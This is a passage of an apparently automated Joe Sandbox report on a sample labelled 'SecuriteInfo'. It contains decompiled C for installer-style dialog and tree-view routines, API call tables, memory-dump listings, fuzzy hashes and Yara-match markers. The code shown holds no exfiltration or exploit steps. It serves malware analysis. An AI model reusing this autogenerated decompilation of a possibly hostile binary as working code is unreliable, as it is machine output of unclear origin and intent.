                                                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                            									} else {
                                                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                            										_t208 =  *_t284;
                                                                            										_v36 =  &(_t284[1]);
                                                                            									}
                                                                            									_a6 = _t208;
                                                                            								} else {
                                                                            									_a4 = 0xc0;
                                                                            								}
                                                                            								_t286 = 1 << _v8 - _t186;
                                                                            								_t244 = _v12 >> _t186;
                                                                            								while(_t244 < _v40) {
                                                                            									 *(_t168 + _t244 * 4) = _a4;
                                                                            									_t244 = _t244 + _t286;
                                                                            								}
                                                                            								_t287 = _v12;
                                                                            								_t246 = 1 << _v44;
                                                                            								while((_t287 & _t246) != 0) {
                                                                            									_t287 = _t287 ^ _t246;
                                                                            									_t246 = _t246 >> 1;
                                                                            								}
                                                                            								_t288 = _t287 ^ _t246;
                                                                            								_v20 = 1;
                                                                            								_v12 = _t288;
                                                                            								_t251 = _v16;
                                                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                            									L60:
                                                                            									if(_v48 != 0) {
                                                                            										_t282 = _v48;
                                                                            										_t283 = _t282 - 1;
                                                                            										_t200 = _a28 + _t186;
                                                                            										_v48 = _t283;
                                                                            										_v24 = _t200;
                                                                            										if(_v8 <= _t200) {
                                                                            											goto L45;
                                                                            										}
                                                                            										goto L31;
                                                                            									}
                                                                            									break;
                                                                            								} else {
                                                                            									goto L58;
                                                                            								}
                                                                            								do {
                                                                            									L58:
                                                                            									_t186 = _t186 - _a28;
                                                                            									_t251 = _t251 - 1;
                                                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                            								_v16 = _t251;
                                                                            								goto L60;
                                                                            							}
                                                                            							L61:
                                                                            							_v8 = _v8 + 1;
                                                                            							_v32 = _v32 + 4;
                                                                            							_v44 = _v44 + 1;
                                                                            						} while (_v8 <= _v28);
                                                                            						goto L62;
                                                                            					}
                                                                            					_t277 = 0;
                                                                            					do {
                                                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                            						_t277 = _t277 + 4;
                                                                            						_t235 = _t235 - 1;
                                                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                            					} while (_t235 != 0);
                                                                            					goto L21;
                                                                            				}
                                                                            				 *_a24 =  *_a24 & 0x00000000;
                                                                            				 *_a28 =  *_a28 & 0x00000000;
                                                                            				return 0;
                                                                            			}

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5918e56615677b8c360487947ec1ce1d761ac5fca8099dd6596a679b7b29a937
                                                                            • Instruction ID: 40f6e0bc0b31222a7e5cfc03d06a34c098e045bc48519f2e5e3589d6ae6743ab
                                                                            • Opcode Fuzzy Hash: 5918e56615677b8c360487947ec1ce1d761ac5fca8099dd6596a679b7b29a937
                                                                            • Instruction Fuzzy Hash: 25A17672A043459FCB348E38CD947EA7BB6EF58320F95442ECC89DB205D7318A85CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateCreateFileMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2773895085-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				struct HWND__* _v12;
                                                                            				long _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				intOrPtr _v28;
                                                                            				signed char* _v32;
                                                                            				int _v36;
                                                                            				signed int _v44;
                                                                            				int _v48;
                                                                            				signed int* _v60;
                                                                            				signed char* _v64;
                                                                            				signed int _v68;
                                                                            				long _v72;
                                                                            				void* _v76;
                                                                            				intOrPtr _v80;
                                                                            				intOrPtr _v84;
                                                                            				void* _v88;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t198;
                                                                            				intOrPtr _t201;
                                                                            				long _t207;
                                                                            				signed int _t211;
                                                                            				signed int _t222;
                                                                            				void* _t225;
                                                                            				void* _t226;
                                                                            				int _t232;
                                                                            				long _t237;
                                                                            				long _t238;
                                                                            				signed int _t239;
                                                                            				signed int _t245;
                                                                            				signed int _t247;
                                                                            				signed char _t248;
                                                                            				signed char _t254;
                                                                            				void* _t258;
                                                                            				void* _t260;
                                                                            				signed char* _t278;
                                                                            				signed char _t279;
                                                                            				long _t284;
                                                                            				struct HWND__* _t291;
                                                                            				signed int* _t292;
                                                                            				int _t293;
                                                                            				long _t294;
                                                                            				signed int _t295;
                                                                            				void* _t297;
                                                                            				long _t298;
                                                                            				int _t299;
                                                                            				signed int _t300;
                                                                            				signed int _t303;
                                                                            				signed int _t311;
                                                                            				signed char* _t319;
                                                                            				int _t324;
                                                                            				void* _t326;
                                                                            
                                                                            				_t291 = _a4;
                                                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                            				_v8 = GetDlgItem(_t291, 0x408);
                                                                            				_t326 = SendMessageW;
                                                                            				_v24 =  *0x434f28;
                                                                            				_v28 =  *0x434f10 + 0x94;
                                                                            				if(_a8 != 0x110) {
                                                                            					L23:
                                                                            					if(_a8 != 0x405) {
                                                                            						_t301 = _a16;
                                                                            					} else {
                                                                            						_a12 = 0;
                                                                            						_t301 = 1;
                                                                            						_a8 = 0x40f;
                                                                            						_a16 = 1;
                                                                            					}
                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                            						_v16 = _t301;
                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                            							if(( *0x434f19 & 0x00000002) != 0) {
                                                                            								L41:
                                                                            								if(_v16 != 0) {
                                                                            									_t237 = _v16;
                                                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                            									}
                                                                            									_t238 = _v16;
                                                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                            										_t301 = _v24;
                                                                            										_t239 =  *(_t238 + 0x5c);
                                                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                            										} else {
                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L48;
                                                                            							}
                                                                            							if(_a8 == 0x413) {
                                                                            								L33:
                                                                            								_t301 = 0 | _a8 != 0x00000413;
                                                                            								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                            								_t295 = _t245;
                                                                            								if(_t295 >= 0) {
                                                                            									_t94 = _v24 + 8; // 0x8
                                                                            									_t301 = _t245 * 0x818 + _t94;
                                                                            									_t247 =  *_t301;
                                                                            									if((_t247 & 0x00000010) == 0) {
                                                                            										if((_t247 & 0x00000040) == 0) {
                                                                            											_t248 = _t247 ^ 0x00000001;
                                                                            										} else {
                                                                            											_t254 = _t247 ^ 0x00000080;
                                                                            											if(_t254 >= 0) {
                                                                            												_t248 = _t254 & 0x000000fe;
                                                                            											} else {
                                                                            												_t248 = _t254 | 0x00000001;
                                                                            											}
                                                                            										}
                                                                            										 *_t301 = _t248;
                                                                            										E0040117D(_t295);
                                                                            										_a12 = _t295 + 1;
                                                                            										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                            										_a8 = 0x40f;
                                                                            									}
                                                                            								}
                                                                            								goto L41;
                                                                            							}
                                                                            							_t301 = _a16;
                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                            								goto L41;
                                                                            							}
                                                                            							goto L33;
                                                                            						} else {
                                                                            							goto L48;
                                                                            						}
                                                                            					} else {
                                                                            						L48:
                                                                            						if(_a8 != 0x111) {
                                                                            							L56:
                                                                            							if(_a8 == 0x200) {
                                                                            								SendMessageW(_v8, 0x200, 0, 0);
                                                                            							}
                                                                            							if(_a8 == 0x40b) {
                                                                            								_t225 =  *0x42d24c;
                                                                            								if(_t225 != 0) {
                                                                            									ImageList_Destroy(_t225);
                                                                            								}
                                                                            								_t226 =  *0x42d260;
                                                                            								if(_t226 != 0) {
                                                                            									GlobalFree(_t226);
                                                                            								}
                                                                            								 *0x42d24c = 0;
                                                                            								 *0x42d260 = 0;
                                                                            								 *0x434f60 = 0;
                                                                            							}
                                                                            							if(_a8 != 0x40f) {
                                                                            								L90:
                                                                            								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                            									ShowWindow(_v8, _t324);
                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                            								}
                                                                            								goto L93;
                                                                            							} else {
                                                                            								E004011EF(_t301, 0, 0);
                                                                            								_t198 = _a12;
                                                                            								if(_t198 != 0) {
                                                                            									if(_t198 != 0xffffffff) {
                                                                            										_t198 = _t198 - 1;
                                                                            									}
                                                                            									_push(_t198);
                                                                            									_push(8);
                                                                            									E00404ED4();
                                                                            								}
                                                                            								if(_a16 == 0) {
                                                                            									L75:
                                                                            									E004011EF(_t301, 0, 0);
                                                                            									_v36 =  *0x42d260;
                                                                            									_t201 =  *0x434f28;
                                                                            									_v64 = 0xf030;
                                                                            									_v24 = 0;
                                                                            									if( *0x434f2c <= 0) {
                                                                            										L86:
                                                                            										if( *0x434fbe == 0x400) {
                                                                            											InvalidateRect(_v8, 0, 1);
                                                                            										}
                                                                            										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                                            											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                            										}
                                                                            										goto L90;
                                                                            									}
                                                                            									_t292 = _t201 + 8;
                                                                            									do {
                                                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                            										if(_t207 != 0) {
                                                                            											_t303 =  *_t292;
                                                                            											_v72 = _t207;
                                                                            											_v76 = 8;
                                                                            											if((_t303 & 0x00000001) != 0) {
                                                                            												_v76 = 9;
                                                                            												_v60 =  &(_t292[4]);
                                                                            												_t292[0] = _t292[0] & 0x000000fe;
                                                                            											}
                                                                            											if((_t303 & 0x00000040) == 0) {
                                                                            												_t211 = (_t303 & 0x00000001) + 1;
                                                                            												if((_t303 & 0x00000010) != 0) {
                                                                            													_t211 = _t211 + 3;
                                                                            												}
                                                                            											} else {
                                                                            												_t211 = 3;
                                                                            											}
                                                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                            										}
                                                                            										_v24 = _v24 + 1;
                                                                            										_t292 =  &(_t292[0x206]);
                                                                            									} while (_v24 <  *0x434f2c);
                                                                            									goto L86;
                                                                            								} else {
                                                                            									_t293 = E004012E2( *0x42d260);
                                                                            									E00401299(_t293);
                                                                            									_t222 = 0;
                                                                            									_t301 = 0;
                                                                            									if(_t293 <= 0) {
                                                                            										L74:
                                                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                            										_a16 = _t293;
                                                                            										_a8 = 0x420;
                                                                            										goto L75;
                                                                            									} else {
                                                                            										goto L71;
                                                                            									}
                                                                            									do {
                                                                            										L71:
                                                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                            											_t301 = _t301 + 1;
                                                                            										}
                                                                            										_t222 = _t222 + 1;
                                                                            									} while (_t222 < _t293);
                                                                            									goto L74;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                            							goto L93;
                                                                            						} else {
                                                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                            							if(_t232 == 0xffffffff) {
                                                                            								goto L93;
                                                                            							}
                                                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                            								_t294 = 0x20;
                                                                            							}
                                                                            							E00401299(_t294);
                                                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                                                            							_a12 = _a12 | 0xffffffff;
                                                                            							_a16 = 0;
                                                                            							_a8 = 0x40f;
                                                                            							goto L56;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_v36 = 0;
                                                                            					_v20 = 2;
                                                                            					 *0x434f60 = _t291;
                                                                            					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                            					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                            					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                            					_t297 = _t258;
                                                                            					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                            					 *0x42d24c = _t260;
                                                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                            					}
                                                                            					DeleteObject(_t297);
                                                                            					_t298 = 0;
                                                                            					do {
                                                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                            							if(_t298 != 0x20) {
                                                                            								_v20 = 0;
                                                                            							}
                                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                            						}
                                                                            						_t298 = _t298 + 1;
                                                                            					} while (_t298 < 0x21);
                                                                            					_t299 = _a16;
                                                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                            					_push(0x15);
                                                                            					E00404499(_a4);
                                                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                            					_push(0x16);
                                                                            					E00404499(_a4);
                                                                            					_t300 = 0;
                                                                            					_v16 = 0;
                                                                            					if( *0x434f2c <= 0) {
                                                                            						L19:
                                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t319 = _v24 + 8;
                                                                            						_v32 = _t319;
                                                                            						do {
                                                                            							_t278 =  &(_t319[0x10]);
                                                                            							if( *_t278 != 0) {
                                                                            								_v64 = _t278;
                                                                            								_t279 =  *_t319;
                                                                            								_v88 = _v16;
                                                                            								_t311 = 0x20;
                                                                            								_v84 = 0xffff0002;
                                                                            								_v80 = 0xd;
                                                                            								_v68 = _t311;
                                                                            								_v44 = _t300;
                                                                            								_v72 = _t279 & _t311;
                                                                            								if((_t279 & 0x00000002) == 0) {
                                                                            									if((_t279 & 0x00000004) == 0) {
                                                                            										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                            									} else {
                                                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                            									}
                                                                            								} else {
                                                                            									_v80 = 0x4d;
                                                                            									_v48 = 1;
                                                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                            									_v36 = 1;
                                                                            									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                            									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                            								}
                                                                            							}
                                                                            							_t300 = _t300 + 1;
                                                                            							_t319 =  &(_v32[0x818]);
                                                                            							_v32 = _t319;
                                                                            						} while (_t300 <  *0x434f2c);
                                                                            						if(_v36 != 0) {
                                                                            							L20:
                                                                            							if(_v20 != 0) {
                                                                            								E004044CE(_v8);
                                                                            								goto L23;
                                                                            							} else {
                                                                            								ShowWindow(_v12, 5);
                                                                            								E004044CE(_v12);
                                                                            								L93:
                                                                            								return E00404500(_a8, _a12, _a16);
                                                                            							}
                                                                            						}
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            			}
                                                                            0x00405326
                                                                            0x0040532d
                                                                            0x00405330
                                                                            0x00405330
                                                                            0x00405336
                                                                            0x0040533d
                                                                            0x00405340
                                                                            0x00405340
                                                                            0x00405346
                                                                            0x0040534c
                                                                            0x00405352
                                                                            0x00405352
                                                                            0x0040535f
                                                                            0x004054c0
                                                                            0x004054c7
                                                                            0x004054e4
                                                                            0x004054ea
                                                                            0x004054fc
                                                                            0x004054fc
                                                                            0x00000000
                                                                            0x00405365
                                                                            0x00405367
                                                                            0x0040536c
                                                                            0x00405371
                                                                            0x00405376
                                                                            0x00405378
                                                                            0x00405378
                                                                            0x00405379
                                                                            0x0040537a
                                                                            0x0040537c
                                                                            0x0040537c
                                                                            0x00405384
                                                                            0x004053c5
                                                                            0x004053c7
                                                                            0x004053d7
                                                                            0x004053da
                                                                            0x004053df
                                                                            0x004053e6
                                                                            0x004053e9
                                                                            0x0040548b
                                                                            0x00405494
                                                                            0x0040549c
                                                                            0x0040549c
                                                                            0x004054aa
                                                                            0x004054bb
                                                                            0x004054bb
                                                                            0x00000000
                                                                            0x004054aa
                                                                            0x004053ef
                                                                            0x004053f2
                                                                            0x004053f8
                                                                            0x004053fd
                                                                            0x004053ff
                                                                            0x00405401
                                                                            0x00405407
                                                                            0x0040540e
                                                                            0x00405413
                                                                            0x0040541a
                                                                            0x0040541d
                                                                            0x0040541d
                                                                            0x00405424
                                                                            0x00405430
                                                                            0x00405434
                                                                            0x00405436
                                                                            0x00405436
                                                                            0x00405426
                                                                            0x00405428
                                                                            0x00405428
                                                                            0x00405456
                                                                            0x00405462
                                                                            0x00405471
                                                                            0x00405471
                                                                            0x00405473
                                                                            0x00405476
                                                                            0x0040547f
                                                                            0x00000000
                                                                            0x00405386
                                                                            0x00405391
                                                                            0x00405394
                                                                            0x00405399
                                                                            0x0040539b
                                                                            0x0040539f
                                                                            0x004053af
                                                                            0x004053b9
                                                                            0x004053bb
                                                                            0x004053be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x004053a1
                                                                            0x004053a7
                                                                            0x004053a9
                                                                            0x004053a9
                                                                            0x004053aa
                                                                            0x004053ab
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x00405384
                                                                            0x0040535f
                                                                            0x004052a2
                                                                            0x00000000
                                                                            0x004052b8
                                                                            0x004052c2
                                                                            0x004052c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004052d9
                                                                            0x004052de
                                                                            0x004052ea
                                                                            0x004052ea
                                                                            0x004052ec
                                                                            0x004052fb
                                                                            0x004052fd
                                                                            0x00405301
                                                                            0x00405304
                                                                            0x00000000
                                                                            0x00405304
                                                                            0x004052a2
                                                                            0x00404f58
                                                                            0x00404f5d
                                                                            0x00404f66
                                                                            0x00404f6d
                                                                            0x00404f7f
                                                                            0x00404f8a
                                                                            0x00404f90
                                                                            0x00404f9e
                                                                            0x00404fb2
                                                                            0x00404fb7
                                                                            0x00404fc4
                                                                            0x00404fc9
                                                                            0x00404fdf
                                                                            0x00404ff0
                                                                            0x00404ffd
                                                                            0x00404ffd
                                                                            0x00405000
                                                                            0x00405006
                                                                            0x00405008
                                                                            0x0040500b
                                                                            0x00405010
                                                                            0x00405015
                                                                            0x00405017
                                                                            0x00405017
                                                                            0x00405037
                                                                            0x00405037
                                                                            0x00405039
                                                                            0x0040503a
                                                                            0x0040503f
                                                                            0x00405045
                                                                            0x00405049
                                                                            0x0040504e
                                                                            0x00405056
                                                                            0x0040505a
                                                                            0x0040505f
                                                                            0x00405064
                                                                            0x0040506c
                                                                            0x0040506f
                                                                            0x0040513f
                                                                            0x00405152
                                                                            0x00000000
                                                                            0x00405075
                                                                            0x00405078
                                                                            0x0040507b
                                                                            0x0040507e
                                                                            0x0040507e
                                                                            0x00405084
                                                                            0x0040508d
                                                                            0x00405090
                                                                            0x00405094
                                                                            0x00405097
                                                                            0x0040509a
                                                                            0x004050a3
                                                                            0x004050ac
                                                                            0x004050af
                                                                            0x004050b2
                                                                            0x004050b5
                                                                            0x004050f3
                                                                            0x0040511e
                                                                            0x004050f5
                                                                            0x00405104
                                                                            0x00405104
                                                                            0x004050b7
                                                                            0x004050ba
                                                                            0x004050c8
                                                                            0x004050d2
                                                                            0x004050da
                                                                            0x004050e1
                                                                            0x004050ec
                                                                            0x004050ec
                                                                            0x004050b5
                                                                            0x00405124
                                                                            0x00405125
                                                                            0x00405131
                                                                            0x00405131
                                                                            0x0040513d
                                                                            0x00405158
                                                                            0x0040515b
                                                                            0x00405178
                                                                            0x00000000
                                                                            0x0040515d
                                                                            0x00405162
                                                                            0x0040516b
                                                                            0x004054fe
                                                                            0x00405510
                                                                            0x00405510
                                                                            0x0040515b
                                                                            0x00000000
                                                                            0x0040513d
                                                                            0x0040506f

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                            • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                            • DeleteObject.GDI32(00000000), ref: 00405000
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                            • GlobalFree.KERNEL32(?), ref: 00405340
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                            • ShowWindow.USER32(00000000), ref: 004054FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                            • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void* _v16;
                                                                            				struct HWND__* _t56;
                                                                            				intOrPtr _t69;
                                                                            				signed int _t75;
                                                                            				signed short* _t76;
                                                                            				signed short* _t78;
                                                                            				long _t92;
                                                                            				int _t103;
                                                                            				signed int _t110;
                                                                            				intOrPtr _t113;
                                                                            				WCHAR* _t114;
                                                                            				signed int* _t116;
                                                                            				WCHAR* _t117;
                                                                            				struct HWND__* _t118;
                                                                            
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 != 0x111) {
                                                                            						L13:
                                                                            						if(_a8 != 0x4e) {
                                                                            							if(_a8 == 0x40b) {
                                                                            								 *0x42b234 =  *0x42b234 + 1;
                                                                            							}
                                                                            							L27:
                                                                            							_t114 = _a16;
                                                                            							L28:
                                                                            							return E00404500(_a8, _a12, _t114);
                                                                            						}
                                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                            						_t114 = _a16;
                                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                            							_v12 = _t103;
                                                                            							_v16 = _t113;
                                                                            							_v8 = 0x432ea0;
                                                                            							if(_t103 - _t113 < 0x800) {
